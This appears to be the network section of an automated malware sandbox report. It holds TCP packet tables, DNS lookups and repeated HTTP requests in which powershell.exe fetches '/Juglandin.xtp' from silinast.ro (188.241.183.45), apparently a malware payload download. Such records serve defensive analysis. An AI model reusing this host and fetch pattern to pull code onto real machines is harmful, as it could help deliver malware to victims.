              Oct 8, 2024 11:04:48.449420929 CEST6239780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:48.454273939 CEST8062397188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:48.454417944 CEST6239780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:48.454600096 CEST6239780192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:48.459394932 CEST8062397188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:48.459570885 CEST8062397188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:48.460799932 CEST6239880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:48.465650082 CEST8062398188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:48.467246056 CEST6239880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:48.467355013 CEST6239880192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:48.472131968 CEST8062398188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:48.472609043 CEST8062398188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:52.481137991 CEST6239980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:52.803320885 CEST8062399188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:52.803419113 CEST6239980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:52.803606033 CEST6239980192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:52.808962107 CEST8062399188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:52.810807943 CEST8062399188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:52.812736988 CEST6240080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:52.817631960 CEST8062400188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:52.817713976 CEST6240080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:52.817888021 CEST6240080192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:52.823313951 CEST8062400188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:52.823323965 CEST8062400188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.857016087 CEST6240180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.861995935 CEST8062401188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.862071037 CEST6240180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.862248898 CEST6240180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.867687941 CEST8062401188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.867705107 CEST8062401188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.867743015 CEST6240180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.867835999 CEST6240180192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.870769978 CEST6240280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.872704029 CEST8062401188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.872718096 CEST8062401188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.875623941 CEST8062402188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.875684023 CEST6240280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.875790119 CEST6240280192.168.2.6188.241.183.45
              Oct 8, 2024 11:04:56.880727053 CEST8062402188.241.183.45192.168.2.6
              Oct 8, 2024 11:04:56.881247997 CEST8062402188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.935128927 CEST6240380192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.939966917 CEST8062403188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.940046072 CEST6240380192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.940125942 CEST6240380192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.945000887 CEST8062403188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.945575953 CEST8062403188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.947179079 CEST6240480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.952094078 CEST8062404188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.952179909 CEST6240480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.955046892 CEST6240480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.957418919 CEST8062404188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.957540989 CEST6240480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.957637072 CEST6240480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:00.959810972 CEST8062404188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.962393045 CEST8062404188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:00.962414026 CEST8062404188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:04.983736038 CEST6240580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:04.988651991 CEST8062405188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:04.988764048 CEST6240580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:04.988873005 CEST6240580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:04.993755102 CEST8062405188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:04.994028091 CEST8062405188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:04.995631933 CEST6240680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:05.000550985 CEST8062406188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:05.000624895 CEST6240680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:05.000705004 CEST6240680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:05.005430937 CEST8062406188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:05.005740881 CEST8062406188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.030013084 CEST6240780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.034934998 CEST8062407188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.035022974 CEST6240780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.035557032 CEST6240780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.040595055 CEST8062407188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.040677071 CEST8062407188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.040683031 CEST6240780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.041352034 CEST6240780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.042727947 CEST6240880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.045552969 CEST8062407188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.046346903 CEST8062407188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.047650099 CEST8062408188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.047736883 CEST6240880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.052022934 CEST6240880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.052727938 CEST8062408188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.052786112 CEST6240880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.052867889 CEST6240880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:09.058402061 CEST8062408188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.058478117 CEST8062408188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:09.058506012 CEST8062408188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.078879118 CEST6240980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.086134911 CEST8062409188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.086203098 CEST6240980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.086461067 CEST6240980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.092988968 CEST8062409188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.094783068 CEST8062409188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.096801043 CEST6241080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.103559971 CEST8062410188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.103635073 CEST6241080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.104037046 CEST6241080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.109199047 CEST8062410188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.109293938 CEST6241080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.109642029 CEST6241080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:13.110858917 CEST8062410188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.115912914 CEST8062410188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:13.116350889 CEST8062410188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:17.232358932 CEST6241180192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:17.237503052 CEST8062411188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:17.237584114 CEST6241180192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:17.237698078 CEST6241180192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:17.242600918 CEST8062411188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:17.243073940 CEST8062411188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:17.244462013 CEST6241280192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:17.249383926 CEST8062412188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:17.249447107 CEST6241280192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:17.249528885 CEST6241280192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:17.254611969 CEST8062412188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:17.254966021 CEST8062412188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:21.278810024 CEST6241380192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:21.283940077 CEST8062413188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:21.284022093 CEST6241380192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:21.284116983 CEST6241380192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:21.288957119 CEST8062413188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:21.289366961 CEST8062413188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:21.290124893 CEST6241480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:21.295110941 CEST8062414188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:21.295177937 CEST6241480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:21.295300007 CEST6241480192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:21.300108910 CEST8062414188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:21.300591946 CEST8062414188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:25.341486931 CEST6241580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:25.346764088 CEST8062415188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:25.346863985 CEST6241580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:25.347069979 CEST6241580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:25.352114916 CEST8062415188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:25.352410078 CEST8062415188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:25.353728056 CEST6241680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:25.359654903 CEST8062416188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:25.359738111 CEST6241680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:25.359805107 CEST6241680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:25.365119934 CEST8062416188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:25.365324974 CEST8062416188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:29.373018980 CEST6241780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:29.377929926 CEST8062417188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:29.378009081 CEST6241780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:29.378079891 CEST6241780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:29.382832050 CEST8062417188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:29.383196115 CEST8062417188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:29.384248018 CEST6241880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:29.389085054 CEST8062418188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:29.389137983 CEST6241880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:29.389225006 CEST6241880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:29.394073963 CEST8062418188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:29.394402027 CEST8062418188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:33.433376074 CEST6241980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:33.438220024 CEST8062419188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:33.438288927 CEST6241980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:33.438395023 CEST6241980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:33.443176031 CEST8062419188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:33.443459034 CEST8062419188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:33.444919109 CEST6242080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:33.449848890 CEST8062420188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:33.449925900 CEST6242080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:33.450130939 CEST6242080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:33.455105066 CEST8062420188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:33.455573082 CEST8062420188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:37.497739077 CEST6242180192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:37.503103018 CEST8062421188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:37.503179073 CEST6242180192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:37.503359079 CEST6242180192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:37.508621931 CEST8062421188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:37.509028912 CEST8062421188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:37.510379076 CEST6242280192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:37.515187025 CEST8062422188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:37.515322924 CEST6242280192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:37.515322924 CEST6242280192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:37.520080090 CEST8062422188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:37.520369053 CEST8062422188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:41.529280901 CEST6242580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:41.534029961 CEST8062425188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:41.534101963 CEST6242580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:41.534184933 CEST6242580192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:41.539017916 CEST8062425188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:41.539164066 CEST8062425188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:41.540668011 CEST6242680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:41.545476913 CEST8062426188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:41.545546055 CEST6242680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:41.545600891 CEST6242680192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:41.550415993 CEST8062426188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:41.550662041 CEST8062426188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.740283012 CEST6242780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.745162010 CEST8062427188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.745254040 CEST6242780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.747153044 CEST6242780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.750364065 CEST8062427188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.750411987 CEST6242780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.751980066 CEST8062427188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.754270077 CEST6242780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.754669905 CEST6242880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.755196095 CEST8062427188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.759048939 CEST8062427188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.759444952 CEST8062428188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.759536982 CEST6242880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.763678074 CEST6242880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.764585018 CEST8062428188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.764858007 CEST6242880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:45.768501997 CEST8062428188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:45.769678116 CEST8062428188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.794765949 CEST6242980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.800611973 CEST8062429188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.800786018 CEST6242980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.801388025 CEST6242980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.806858063 CEST8062429188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.806937933 CEST6242980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.807077885 CEST6242980192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.807200909 CEST8062429188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.808177948 CEST6243080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.812930107 CEST8062429188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.813086987 CEST8062429188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.813910961 CEST8062430188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.813976049 CEST6243080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.814071894 CEST6243080192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:49.818794012 CEST8062430188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:49.819020987 CEST8062430188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:53.825016975 CEST6243780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:53.830815077 CEST8062437188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:53.830915928 CEST6243780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:53.831067085 CEST6243780192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:53.837970972 CEST8062437188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:53.838133097 CEST8062437188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:53.839070082 CEST6243880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:53.844719887 CEST8062438188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:53.844815969 CEST6243880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:53.844997883 CEST6243880192.168.2.6188.241.183.45
              Oct 8, 2024 11:05:53.854062080 CEST8062438188.241.183.45192.168.2.6
              Oct 8, 2024 11:05:53.854443073 CEST8062438188.241.183.45192.168.2.6

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 8, 2024 11:01:48.675131083 CEST5712253192.168.2.61.1.1.1
              Oct 8, 2024 11:01:48.691035986 CEST53571221.1.1.1192.168.2.6
              Oct 8, 2024 11:01:50.925407887 CEST6352753192.168.2.61.1.1.1
              Oct 8, 2024 11:01:50.979487896 CEST53635271.1.1.1192.168.2.6
              Oct 8, 2024 11:02:06.624134064 CEST53639221.1.1.1192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 8, 2024 11:01:48.675131083 CEST192.168.2.61.1.1.10xa0bfStandard query (0)6777.6777.6777.677eA (IP address)IN (0x0001)false
              Oct 8, 2024 11:01:50.925407887 CEST192.168.2.61.1.1.10xdd42Standard query (0)silinast.roA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 8, 2024 11:01:48.691035986 CEST1.1.1.1192.168.2.60xa0bfName error (3)6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
              Oct 8, 2024 11:01:50.979487896 CEST1.1.1.1192.168.2.60xdd42No error (0)silinast.ro188.241.183.45A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • silinast.ro

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649764188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:51.010797977 CEST168OUTGET /Juglandin.xtp HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649765188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:51.032905102 CEST168OUTGET /Juglandin.xtp HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.649800188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:55.386255980 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.649801188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:55.399945021 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.649827188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:59.429553986 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.649828188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:59.445091009 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.649840188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:03.515549898 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.649841188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:03.526402950 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.662204188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:07.533785105 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.662205188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:07.545013905 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.662206188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:11.604522943 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.662207188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:11.616449118 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.662208188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:15.766910076 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.662209188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:15.781862974 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.662210188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:20.132886887 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.662211188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:20.144181013 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.662212188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:24.156074047 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.662213188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:24.166860104 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.662214188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:28.204714060 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.662215188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:28.216144085 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.662239188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:32.239213943 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.662240188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:32.249557018 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.662243188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:36.328084946 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.662244188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:36.338532925 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.662245188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:40.343605042 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.662246188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
